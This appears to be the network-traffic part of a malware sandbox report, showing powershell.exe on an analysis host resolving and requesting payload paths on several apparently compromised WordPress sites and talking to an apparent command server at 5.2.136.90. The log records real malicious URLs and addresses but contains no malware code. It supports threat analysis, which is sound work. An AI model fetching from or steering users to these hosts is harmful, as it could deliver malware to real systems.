Jan 6, 2021 08:41:32.924407005 CET	49167	80	192.168.2.22	104.18.61.59
Jan 6, 2021 08:41:32.924809933 CET	49168	80	192.168.2.22	104.27.144.251
Jan 6, 2021 08:41:52.090451002 CET	49171	80	192.168.2.22	5.2.136.90
Jan 6, 2021 08:41:52.161461115 CET	80	49171	5.2.136.90	192.168.2.22
Jan 6, 2021 08:41:52.161572933 CET	49171	80	192.168.2.22	5.2.136.90
Jan 6, 2021 08:41:52.162594080 CET	49171	80	192.168.2.22	5.2.136.90
Jan 6, 2021 08:41:52.162730932 CET	49171	80	192.168.2.22	5.2.136.90
Jan 6, 2021 08:41:52.234396935 CET	80	49171	5.2.136.90	192.168.2.22
Jan 6, 2021 08:41:52.234513044 CET	49171	80	192.168.2.22	5.2.136.90
Jan 6, 2021 08:41:52.306725979 CET	80	49171	5.2.136.90	192.168.2.22
Jan 6, 2021 08:41:52.306741953 CET	80	49171	5.2.136.90	192.168.2.22
Jan 6, 2021 08:41:52.874428034 CET	80	49171	5.2.136.90	192.168.2.22
Jan 6, 2021 08:41:52.874629021 CET	49171	80	192.168.2.22	5.2.136.90
Jan 6, 2021 08:41:52.875452995 CET	80	49171	5.2.136.90	192.168.2.22
Jan 6, 2021 08:41:52.875669956 CET	49171	80	192.168.2.22	5.2.136.90
Jan 6, 2021 08:41:52.947520971 CET	80	49171	5.2.136.90	192.168.2.22
Jan 6, 2021 08:41:52.947695017 CET	49171	80	192.168.2.22	5.2.136.90
Jan 6, 2021 08:42:57.870368004 CET	80	49171	5.2.136.90	192.168.2.22
Jan 6, 2021 08:42:57.870552063 CET	49171	80	192.168.2.22	5.2.136.90

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2021 08:41:27.130588055 CET	52197	53	192.168.2.22	8.8.8.8
Jan 6, 2021 08:41:27.189559937 CET	53	52197	8.8.8.8	192.168.2.22
Jan 6, 2021 08:41:27.326963902 CET	53099	53	192.168.2.22	8.8.8.8
Jan 6, 2021 08:41:27.396306038 CET	53	53099	8.8.8.8	192.168.2.22
Jan 6, 2021 08:41:27.515664101 CET	52838	53	192.168.2.22	8.8.8.8
Jan 6, 2021 08:41:27.683065891 CET	53	52838	8.8.8.8	192.168.2.22
Jan 6, 2021 08:41:28.015238047 CET	61200	53	192.168.2.22	8.8.8.8
Jan 6, 2021 08:41:29.015691996 CET	61200	53	192.168.2.22	8.8.8.8
Jan 6, 2021 08:41:30.029863119 CET	61200	53	192.168.2.22	8.8.8.8
Jan 6, 2021 08:41:30.074006081 CET	53	61200	8.8.8.8	192.168.2.22
Jan 6, 2021 08:41:30.090023994 CET	49548	53	192.168.2.22	8.8.8.8
Jan 6, 2021 08:41:30.761930943 CET	53	49548	8.8.8.8	192.168.2.22
Jan 6, 2021 08:41:31.074851036 CET	53	61200	8.8.8.8	192.168.2.22
Jan 6, 2021 08:41:32.089596033 CET	53	61200	8.8.8.8	192.168.2.22

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jan 6, 2021 08:41:31.074932098 CET	192.168.2.22	8.8.8.8	d00a	(Port unreachable)	Destination Unreachable
Jan 6, 2021 08:41:32.089687109 CET	192.168.2.22	8.8.8.8	d00a	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 6, 2021 08:41:27.130588055 CET	192.168.2.22	8.8.8.8	0x1168	Standard query (0)	wpsapk.com	A (IP address)	IN (0x0001)
Jan 6, 2021 08:41:27.326963902 CET	192.168.2.22	8.8.8.8	0xc896	Standard query (0)	sofsuite.com	A (IP address)	IN (0x0001)
Jan 6, 2021 08:41:27.515664101 CET	192.168.2.22	8.8.8.8	0x2c09	Standard query (0)	veterinariadrpopui.com	A (IP address)	IN (0x0001)
Jan 6, 2021 08:41:28.015238047 CET	192.168.2.22	8.8.8.8	0xd372	Standard query (0)	shop.elemenslide.com	A (IP address)	IN (0x0001)
Jan 6, 2021 08:41:29.015691996 CET	192.168.2.22	8.8.8.8	0xd372	Standard query (0)	shop.elemenslide.com	A (IP address)	IN (0x0001)
Jan 6, 2021 08:41:30.029863119 CET	192.168.2.22	8.8.8.8	0xd372	Standard query (0)	shop.elemenslide.com	A (IP address)	IN (0x0001)
Jan 6, 2021 08:41:30.090023994 CET	192.168.2.22	8.8.8.8	0x26d4	Standard query (0)	khanhhoahomnay.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 6, 2021 08:41:27.189559937 CET	8.8.8.8	192.168.2.22	0x1168	No error (0)	wpsapk.com		104.18.61.59	A (IP address)	IN (0x0001)
Jan 6, 2021 08:41:27.189559937 CET	8.8.8.8	192.168.2.22	0x1168	No error (0)	wpsapk.com		104.18.60.59	A (IP address)	IN (0x0001)
Jan 6, 2021 08:41:27.189559937 CET	8.8.8.8	192.168.2.22	0x1168	No error (0)	wpsapk.com		172.67.141.14	A (IP address)	IN (0x0001)
Jan 6, 2021 08:41:27.396306038 CET	8.8.8.8	192.168.2.22	0xc896	No error (0)	sofsuite.com		104.27.144.251	A (IP address)	IN (0x0001)
Jan 6, 2021 08:41:27.396306038 CET	8.8.8.8	192.168.2.22	0xc896	No error (0)	sofsuite.com		172.67.158.72	A (IP address)	IN (0x0001)
Jan 6, 2021 08:41:27.396306038 CET	8.8.8.8	192.168.2.22	0xc896	No error (0)	sofsuite.com		104.27.145.251	A (IP address)	IN (0x0001)
Jan 6, 2021 08:41:27.683065891 CET	8.8.8.8	192.168.2.22	0x2c09	No error (0)	veterinariadrpopui.com		209.59.139.39	A (IP address)	IN (0x0001)
Jan 6, 2021 08:41:30.074006081 CET	8.8.8.8	192.168.2.22	0xd372	Server failure (2)	shop.elemenslide.com	none	none	A (IP address)	IN (0x0001)
Jan 6, 2021 08:41:30.761930943 CET	8.8.8.8	192.168.2.22	0x26d4	No error (0)	khanhhoahomnay.net		210.86.239.69	A (IP address)	IN (0x0001)
Jan 6, 2021 08:41:31.074851036 CET	8.8.8.8	192.168.2.22	0xd372	Server failure (2)	shop.elemenslide.com	none	none	A (IP address)	IN (0x0001)
Jan 6, 2021 08:41:32.089596033 CET	8.8.8.8	192.168.2.22	0xd372	Server failure (2)	shop.elemenslide.com	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

wpsapk.com

sofsuite.com

veterinariadrpopui.com

khanhhoahomnay.net

5.2.136.90

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	104.18.61.59	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 6, 2021 08:41:27.251873016 CET	0	OUT	GET /wp-admin/v/ HTTP/1.1 Host: wpsapk.com Connection: Keep-Alive
Jan 6, 2021 08:41:27.312448978 CET	1	IN	HTTP/1.1 200 OK Date: Wed, 06 Jan 2021 07:41:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d2375e5284f1be1790d722030b195a3601609918887; expires=Fri, 05-Feb-21 07:41:27 GMT; path=/; domain=.wpsapk.com; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07783dcd780000fa40c5a11000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=fKtJJY8tFjVQnexAe5bWjafl%2BEFUNfjch1OgiIMepuYy2oUukMRQi9vWtt8dqcEOk4fcWtwZJBYH2ps7qHVwcE%2F%2BK1BjLVD47YKF"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60d3cbf588edfa40-AMS Data Raw: 31 30 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 10d4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,
Jan 6, 2021 08:41:27.312486887 CET	3	IN	Data Raw: 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 Data Ascii: initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.cs
Jan 6, 2021 08:41:27.312506914 CET	4	IN	Data Raw: 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 54 68 69 73 20 6c 69 6e 6b 20 68 61 73 20 62 65 65 6e 20 66 6c 61 Data Ascii: mn"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.</p>
Jan 6, 2021 08:41:27.312525988 CET	5	IN	Data Raw: 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65 72 20 63 66 2d 77 72 61 70 70 65 72 20 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 Data Ascii: div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item
Jan 6, 2021 08:41:27.312544107 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	104.27.144.251	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 6, 2021 08:41:27.447617054 CET	6	OUT	GET /wp-includes/2jm3nIk/ HTTP/1.1 Host: sofsuite.com Connection: Keep-Alive
Jan 6, 2021 08:41:27.507673979 CET	7	IN	HTTP/1.1 200 OK Date: Wed, 06 Jan 2021 07:41:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d50f90dbc9ec71119b4d09926c32149241609918887; expires=Fri, 05-Feb-21 07:41:27 GMT; path=/; domain=.sofsuite.com; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07783dce3c0000279415adb000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Rsjj1xaQTBp1hJp8J11eUNX6bod2%2BFhYA%2BYgoQ3Bi3EURo2vYrB0J6VF8%2Bemg7JVAkvpuVdQ2VOPpniPvgvCfKc4ZCUjljp6gx76Elo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60d3cbf6cb012794-PRG Data Raw: 31 30 64 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 Data Ascii: 10dd<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devic
Jan 6, 2021 08:41:27.507742882 CET	9	IN	Data Raw: 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 Data Ascii: e-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.erro
Jan 6, 2021 08:41:27.507797956 CET	10	IN	Data Raw: 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 54 68 69 73 20 6c 69 6e 6b 20 68 61 73 20 Data Ascii: "cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy sour
Jan 6, 2021 08:41:27.507854939 CET	11	IN	Data Raw: 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65 72 20 63 66 2d 77 72 61 70 Data Ascii: </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class
Jan 6, 2021 08:41:27.507895947 CET	11	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49169	209.59.139.39	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 6, 2021 08:41:27.839674950 CET	12	OUT	GET /content/5f18Q/ HTTP/1.1 Host: veterinariadrpopui.com Connection: Keep-Alive
Jan 6, 2021 08:41:27.995601892 CET	13	IN	HTTP/1.1 500 Internal Server Error Date: Wed, 06 Jan 2021 07:41:27 GMT Server: Apache Content-Length: 7309 Connection: close Content-Type: text/html Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 35 30 39 20 42 61 6e 64 77 69 64 74 68 20 4c 69 6d 69 74 20 45 78 63 65 65 64 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 6e 64 77 69 64 74 68 20 4c 69 6d 69 74 20 45 78 63 65 65 64 65 64 3c 2f 48 31 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>509 Bandwidth Limit Exceeded</TITLE></HEAD><BODY><H1>Bandwidth Limit Exceeded</H1>
Jan 6, 2021 08:41:27.995629072 CET	15	IN	Data Raw: 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a Data Ascii:
Jan 6, 2021 08:41:27.995641947 CET	16	IN	Data Raw: 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 Data Ascii:
Jan 6, 2021 08:41:27.995656967 CET	17	IN	Data Raw: 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 Data Ascii:
Jan 6, 2021 08:41:27.995670080 CET	19	IN	Data Raw: 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 Data Ascii:
Jan 6, 2021 08:41:27.995681047 CET	19	IN	Data Raw: 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49170	210.86.239.69	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 6, 2021 08:41:31.029743910 CET	21	OUT	GET /wordpress/CGMC/ HTTP/1.1 Host: khanhhoahomnay.net Connection: Keep-Alive
